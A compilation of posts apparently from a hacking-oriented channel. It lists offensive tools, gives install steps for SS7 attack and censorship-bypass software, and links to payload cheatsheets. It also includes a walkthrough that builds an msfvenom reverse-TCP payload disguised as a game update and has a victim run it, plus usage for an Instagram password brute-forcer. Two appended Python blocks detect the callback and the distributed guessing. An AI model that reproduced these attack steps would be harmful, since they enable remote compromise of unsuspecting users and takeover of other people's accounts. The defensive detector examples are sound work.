UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform which collects & analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HELPFUL HACKING SPYWARES & TOOLS FOR ANY HACKER :

3proxy 0.7.1.1 Tiny free proxy server. http://3proxy.ru/

3proxy-win32 0.7.1.1 Tiny free proxy server. http://3proxy.ru/

42zip 42 Recursive Zip archive bomb. http://blog.fefe.de/?ts=b6cea88d

acccheck 0.2.1 A password dictionary attack tool that targets Windows authentication via the SMB protocol. http://labs.portcullis.co.uk/tools/acccheck/

Spyse OSINT gathering tool that scans the entire web, enriches and collects all the data in its own DB for instant access. Provided data: IPv4 hosts, sub/domains/whois, ports/banners/protocols, technologies, OS, AS, wide SSL/TLS DB and more. https://spyse.com/

findsubdomains Complete subdomain scanning service (works using OSINT). https://findsubdomains.com

sublist3r Subdomain enumeration tool for penetration testers. https://github.com/aboul3la/Sublist3r

ASlookup Made for identifying the owner of an IP range (CIDR), ASN, related ASN, registry, etc. http://aslookup.com

ace 1.10 Automated Corporate Enumerator. A simple yet powerful VoIP Corporate Directory enumeration tool that mimics the behavior of an IP phone in order to download the name and extension entries that a given phone can display on its screen interface. http://ucsniff.sourceforge.net/ace.html

admid-pack 0.1 ADM DNS spoofing tools. Uses a variety of active and passive methods to spoof DNS packets. Very powerful. http://packetstormsecurity.com/files/10080/ADMid-pkg.tgz.html

adminpagefinder 0.1 This Python script looks for a large number of possible administrative interfaces on a given site. http://packetstormsecurity.com/files/112855/Admin-Page-Finder-Script.html

admsnmp 0.1 ADM SNMP audit scanner.

aesfix 1.0.1 A tool to find AES key in RAM. http://citp.princeton.edu/memory/code/

aeskeyfind 1.0 A tool to find AES key in RAM. http://citp.princeton.edu/memory/code/

aespipe 2.4c Reads data from stdin and outputs encrypted or decrypted results to stdout. http://loop-aes.sourceforge.net/aespipe/

afflib 3.7.3 An extensible open format for the storage of disk images and related forensic information. http://www.afflib.org

afpfs-ng 0.8.1 A client for the Apple Filing Protocol (AFP). http://alexthepuffin.googlepages.com/

against 0.2 A very fast SSH attacking script which includes a multithreaded port scanning module (TCP connect) for discovering possible targets and a multithreaded brute-forcing module which attacks in parallel all discovered hosts or given IP addresses from a list. http://nullsecurity.net/tools/cracker.html

aiengine 339.58dfb85 A packet inspection engine with capabilities of learning without any human intervention. https://bitbucket.org/camp0/aiengine/

aimage 3.2.5 A program to create aff-images. http://www.afflib.org

air 2.0.0 A GUI front-end to dd/dc3dd designed for easily creating forensic images. http://air-imager.sourceforge.net/

airflood 0.1 A modification of aireplay that allows for a DoS on the AP. This program fills the table of clients of the AP with random MACs doing impossible new connections. http://packetstormsecurity.com/files/51127/airflood.1.tar.gz.html

airgraph-ng 2371 Graphing tool for the aircrack suite. http://www.aircrack-ng.org

airoscript 45.0a122ee A script to simplify the use of aircrack-ng tools. http://midnightresearch.com/projects/wicrawl/

airpwn 1.4 A tool for generic packet injection on an 802.11 network. http://airpwn.sourceforge.net

allthevhosts 1.0 A vhost discovery tool that scrapes various web applications. http://labs.portcullis.co.uk/tools/finding-all-the-vhosts/


U S E F O R L E A R N !!
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE SS7 HACKING 2020 UPDATE :

SigPloit is a signaling security testing framework dedicated to telecom security professionals and researchers, to pentest and exploit vulnerabilities in the signaling protocols used by mobile operators regardless of the generation in use. SigPloit aims to cover all protocols used in the operators' interconnects: SS7, GTP (3G), Diameter (4G), or even SIP for IMS and VoLTE infrastructures used in the access layer, and SS7 message encapsulation into SIP-T. Recommendations for each vulnerability will be provided to guide the tester and the operator through the steps that should be taken to enhance their security posture.

INSTALLATION & RUN :

Version 1: SS7
SigPloit will initially start with SS7 vulnerabilities, providing the messages used to test the attack scenarios below:

A- Location Tracking

B- Call and SMS Interception

C- Fraud

Version 2: GTP
This version will focus on the data roaming attacks that occur on the IPX/GRX interconnects.

Version 3: Diameter
This version will focus on the attacks occurring on the LTE roaming interconnects using Diameter as the signaling protocol.

Version 4: SIP
This version will be concerned with SIP as the signaling protocol used in the access layer for voice over LTE (VoLTE) and IMS infrastructure. Also, SIP will be used to encapsulate SS7 messages (ISUP) to be relayed over VoIP providers to SS7 networks, taking advantage of the SIP-T protocol, a protocol extension for SIP that provides intercompatibility between VoIP and SS7 networks.

Version 5: Reporting
This last version will introduce the reporting feature: a comprehensive report with the tests done, along with the recommendations provided for each vulnerability that has been exploited.

The BETA version of SigPloit will have the Location Tracking attacks of the SS7 phase 1.

Installation and requirements

The requirements for this project are:

1) Python 2.7

2) Java version 1.7 +

3) sudo apt-get install lksctp-tools

4) Linux machine

To run, use:

5) cd SigPloit

6) sudo pip2 install -r requirements.txt

7) python sigploit.py

✅GIT 2020
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Traffic Tampering with dnSpy.pdf
900.3 KB
General Traffic Manipulation Intro

Previously we used Wireshark to capture network traffic. Passive sniffing is usually easy but only useful to a degree. If the application was using TLS, we would have seen garbage after the TLS handshake. In these cases, Man-in-the-Middling (MitM-ing) the traffic with a proxy tool (e.g. Burp) is usually the way to go. But that introduces new challenges.

1. Redirecting the traffic to the proxy.

2. Masquerading as the server (e.g. make client accept our proxy's certificate instead of server).

3. Modifying packets.

I will need a lot of pages to talk about these and document what I have learned through the years. This is not the place for it.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑VIRUS/MALWARES /PAYLOADS FREE CREATING TOOLS :

- [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/)

- [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md)

- [Cloud - AWS Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md)

- [Cloud - Azure Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md)

- [Cobalt Strike - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet.md)

- [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md)

- [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)

- [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md)

- [Methodology and enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology%20and%20enumeration.md)

- [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md)

- [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md)

- [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)

- [Subdomains Enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Subdomains%20Enumeration.md)

- [Windows - Download and Execute.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md)

- [Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md)

- [Windows - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md)

- [Windows - Post Exploitation Koadic.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Post%20Exploitation%20Koadic.md)

- [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)

- [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md)

- [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What to do if Magisk shows passing SafetyNet test, but problems persist ?
#requested

1) Google recently launched a new SafetyNet test, which may cause problems with rooted Android devices. A SafetyNet status check is performed using Google servers, which cannot be tricked by conventional means. If Magisk shows that you have passed the SafetyNet test, but you still have problems, this change may be to blame.

Most users run the SafetyNet test through Magisk Manager, but this is no longer recommended. This option only shows local status using old spoofing methods. It may seem like you passed the test, but you have not.

If you want to know what is happening in reality, you need to download a separate application to check the SafetyNet status. It's called SafetyNet Test and is available on the Play Store.

2) The process is very simple. When you have launched the application, click the "Test" button. In a few seconds, you will see if you passed the Google SafetyNet test or not. When Magisk shows you passed SafetyNet but SafetyNet Test fails, Google's change has affected your device.

3) This means the SafetyNet status is checked remotely. If the device passes the SafetyNet test, you should see a Pass message. This is a good sign that your device is not affected by the change.

If you see a “Failed” message, problems may arise in the future. You may lose access to certain apps like Google Pay and Pokémon GO. Google has been working on this for several years and now the result is closer than ever. However, you can still use your modified mods.

4) As more applications may start using the new SafetyNet check, it doesn't hurt to have a second device. This will allow you to work with one of them with root and with the other without. You can find good-quality, affordable Android smartphones and bypass the SafetyNet check.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑bypass GFW trojan 2020 :
An unidentifiable mechanism that helps you bypass GFW.

Trojan features multiple protocols over TLS to avoid both active/passive detections and ISP QoS limitations.

Trojan is not a fixed program or protocol. It's an idea, an idea that imitating the most common service, to an extent that it behaves identically, could help you get across the Great FireWall permanently, without being identified ever. We are the GreatER Fire; we ship Trojan Horses.

INSTALLATION & RUN :

A) sudo bash -c "$(curl -fsSL https://raw.githubusercontent.com/trojan-gfw/trojan-quickstart/master/trojan-quickstart.sh)"
or

sudo bash -c "$(wget -O- https://raw.githubusercontent.com/trojan-gfw/trojan-quickstart/master/trojan-quickstart.sh)"


B) AOSC OS
sudo apt-get install trojan

C) Arch Linux
sudo pacman -S trojan

D) AUR
$(AURHelper) -S trojan-git

E) Debian

Debian 10:
sudo apt install trojan

Debian <= 9 (build the package from source):

1) TROJAN_DEBIAN_VERSION="1.10.0-3"

2) sudo apt update

3) sudo apt install build-essential devscripts debhelper cmake libboost-system-dev libboost-program-options-dev libssl-dev default-libmysqlclient-dev python3 curl openssl

4) dget http://ftp.us.debian.org/debian/pool/main/t/trojan/trojan_${TROJAN_DEBIAN_VERSION}.dsc

5) dpkg-source -x trojan_${TROJAN_DEBIAN_VERSION}.dsc trojan-${TROJAN_DEBIAN_VERSION}

6) cd trojan-${TROJAN_DEBIAN_VERSION}/

7) dpkg-buildpackage -us -uc -d

8) sudo dpkg -i ../trojan_${TROJAN_DEBIAN_VERSION}_$(dpkg-architecture -q DEB_BUILD_ARCH).deb

9) sudo apt purge devscripts debhelper cmake # you can remove it now

F) Ubuntu

1) sudo add-apt-repository ppa:greaterfire/trojan

2) sudo apt-get update

3) sudo apt-get install trojan


🦑 How to bypass, free full tutorial: https://trojan-gfw.github.io/trojan/config

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Hack Windows 10 with Metasploit :

1) Create metasploit

2) Before creating the metasploit, we need to figure out what our Kali Linux local IP is. For that, run ip addr or ifconfig

3) Get the IPv4 local IP

4) Now let’s get our hands dirty!

5) In the terminal run the following command:

> msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=192.168.195.72 LPORT=4444 -o /root/Desktop/GTAVUpdate.exe

6) The command above instructs msfvenom to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as being type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine that we got in the last command, and the LPORT is the port to listen on for a connection from the target once it has been compromised.

7) The name of the .exe is up to you. In this case I’ll be using GTAVUpdate.exe because our target will be a gamer that we know has GTA V.

8) We now need to set up a listener on the port we determined within the executable. We do this by launching Metasploit using the command msfconsole on the Kali Linux terminal.

9) First, we’ll tell Metasploit to use the generic payload handler “multi/handler” using the command use multi/handler. We will then set the payload to match the one set within the executable using the command set payload windows/meterpreter/reverse_tcp. We will then set the LHOST and LPORT this way: set LHOST 192.168.195.72 and set LPORT 4444. Once done, type run or exploit and press Enter.

10) The reverse TCP handler should begin waiting for a
You can use show options to check if everything’s ok

11) If everything’s ok, type run or exploit

🦑Social Engineering :

1) Now comes the part where you need to do some social engineering in order to make the user execute the program.
For this tutorial we will simply host the .exe on apache2 and transfer it to the Windows machine.

2) On the Windows machine you just need to access IP/File.exe via the browser

3) In our case it is 192.168.192.72/GTAVUpdate.exe

4) Now execute it and check the connection on the Kali machine

Now you can dump & do everything

sources- metasploit/undercode/medium
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
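
A defender's view of the chain in the Metasploit walkthrough above (an executable fetched over HTTP from a bare IP, then a TCP session from that executable back to the same host on the handler port), as an added example that is not part of the original post. The event records are constructed and their field names are hypothetical; the host, ports and file name are the ones the post uses.

```python
from datetime import datetime, timedelta

# Constructed telemetry (not real logs). Field names are hypothetical; map them
# from your own EDR/Sysmon pipeline. "download" = a browser saved a file,
# "connect" = a process opened an outbound TCP connection.
EVENTS = [
    {"type": "download", "time": "2020-05-01T10:00:05", "path": r"C:\Users\alice\Downloads\GTAVUpdate.exe",
     "src_host": "192.168.195.72", "src_port": 80},
    {"type": "download", "time": "2020-05-01T10:01:00", "path": r"C:\Users\alice\Downloads\setup.exe",
     "src_host": "cdn.example.com", "src_port": 443},
    {"type": "connect", "time": "2020-05-01T10:02:10", "image": r"c:\users\alice\downloads\gtavupdate.exe",
     "dst_host": "192.168.195.72", "dst_port": 4444},
    {"type": "connect", "time": "2020-05-01T10:03:00", "image": r"C:\Users\alice\Downloads\setup.exe",
     "dst_host": "cdn.example.com", "dst_port": 443},
    {"type": "connect", "time": "2020-05-01T10:04:00", "image": r"C:\Program Files\Browser\browser.exe",
     "dst_host": "192.168.195.72", "dst_port": 80},
]

WEB_PORTS = {80, 443}


def find_callbacks(events, window=timedelta(minutes=30)):
    """Flag a freshly downloaded executable that connects back to the host
    it came from on a port other than the one it was served on."""
    downloads = {}  # lower-cased path -> download event (Windows paths are case-insensitive)
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if ev["type"] == "download" and ev["path"].lower().endswith(".exe"):
            downloads[ev["path"].lower()] = dict(ev, when=when)
        elif ev["type"] == "connect":
            dl = downloads.get(ev["image"].lower())
            if dl is None or when - dl["when"] > window:
                continue  # not a recent download, or too old to correlate
            if ev["dst_host"] == dl["src_host"] and ev["dst_port"] != dl["src_port"]:
                findings.append({
                    "image": ev["image"],
                    "host": ev["dst_host"],
                    "dst_port": ev["dst_port"],
                    "non_web_port": ev["dst_port"] not in WEB_PORTS,
                    "delay_s": int((when - dl["when"]).total_seconds()),
                })
    return findings


if __name__ == "__main__":
    for finding in find_callbacks(EVENTS):
        print(finding)
```

The installer that talks to its CDN on the port it was served from and the browser's own traffic are not flagged; only the download-then-callback pair is.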

🦑HACK INSTAGRAM NEW UPDATE 2020- 3 MONTHS :

This program will brute force any Instagram account you send its way. Just give it a target, a password list and a mode, then press enter and forget about it. No need to worry about anonymity when using this program; its highest priority is your anonymity, and it only attacks when your identity is hidden.

INSTALLATION & RUN :

1) git clone https://github.com/Pure-L0G1C/Instagram.git

2) cd Instagram

3) pip3 install -r requirements.txt

4) C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py -h
usage: instagram.py [-h] [-m MODE] username wordlist

positional arguments:
username email or username
wordlist password list

optional arguments:
-h, --help show this help message and exit
-m MODE, --mode MODE modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots

4) python3 instagram.py <username> <wordlist> -m <mode>

———————————————

5) Bots(Threads)

4 bots: 64 passwords at a time
8 bots: 128 passwords at a time
16 bots: 256 passwords at a time
32 bots: 512 passwords at a time

6) Modes
0: 32 bots
1: 16 bots
2: 8 bots
3: 4 bots

7) Chill mode
This mode uses only 4 bots, or 64 passwords at a time.

C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 3

8) Moderate mode 1
This mode uses 8 bots, or 128 passwords at a time.

C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 2

9) Moderate mode 2
This mode uses 16 bots, or 256 passwords at a time.

C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 1

10) Savage mode
This mode uses 32 bots, or 512 passwords at a time.

C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py Sami09.1 pass.lst -m 0

11) If you don't specify a mode, then mode is set to 2

✅git 2020
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
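
Why the tool in the Instagram post above defeats per-IP rate limiting and what catches it instead, as an added example that is not part of the original post: guesses arrive in parallel batches from sources that hide the attacker, so failures have to be counted per target account. The log records, account names, addresses and thresholds are constructed assumptions; the batch size of 64 is the post's "4 bots" figure.

```python
from collections import defaultdict, deque


def build_constructed_log():
    """Constructed auth log: (epoch_seconds, source_ip, account, success)."""
    log = [
        (1000, "203.0.113.10", "bob", False),   # a user mistyping a password
        (1004, "203.0.113.10", "bob", False),
        (1009, "203.0.113.10", "bob", True),
    ]
    # One 64-guess batch against a single account, each guess from a different address.
    for i in range(64):
        log.append((1010 + i // 8, f"198.51.100.{i + 1}", "target_user", False))
    return sorted(log)


def detect_guessing(log, window_s=60, per_ip_limit=5, per_account_limit=10):
    """Return (ip_alerts, account_alerts) over a sliding window of failed logins.

    ip_alerts: source IPs exceeding per_ip_limit failures in the window.
    account_alerts: account -> peak number of distinct source IPs seen while
    the account exceeded per_account_limit failures in the window.
    """
    ip_fail = defaultdict(deque)       # ip -> timestamps of recent failures
    acct_fail = defaultdict(deque)     # account -> (timestamp, ip) of recent failures
    ip_alerts, account_alerts = set(), {}
    for ts, ip, account, ok in log:
        if ok:
            continue
        ipq = ip_fail[ip]
        ipq.append(ts)
        while ipq[0] <= ts - window_s:
            ipq.popleft()
        if len(ipq) > per_ip_limit:
            ip_alerts.add(ip)

        aq = acct_fail[account]
        aq.append((ts, ip))
        while aq[0][0] <= ts - window_s:
            aq.popleft()
        if len(aq) > per_account_limit:
            distinct = len({src for _, src in aq})
            account_alerts[account] = max(account_alerts.get(account, 0), distinct)
    return ip_alerts, account_alerts


if __name__ == "__main__":
    print(detect_guessing(build_constructed_log()))
```

The per-IP counter stays silent because no single address fails more than twice, while the per-account counter reports the targeted account together with the number of distinct sources behind the failures.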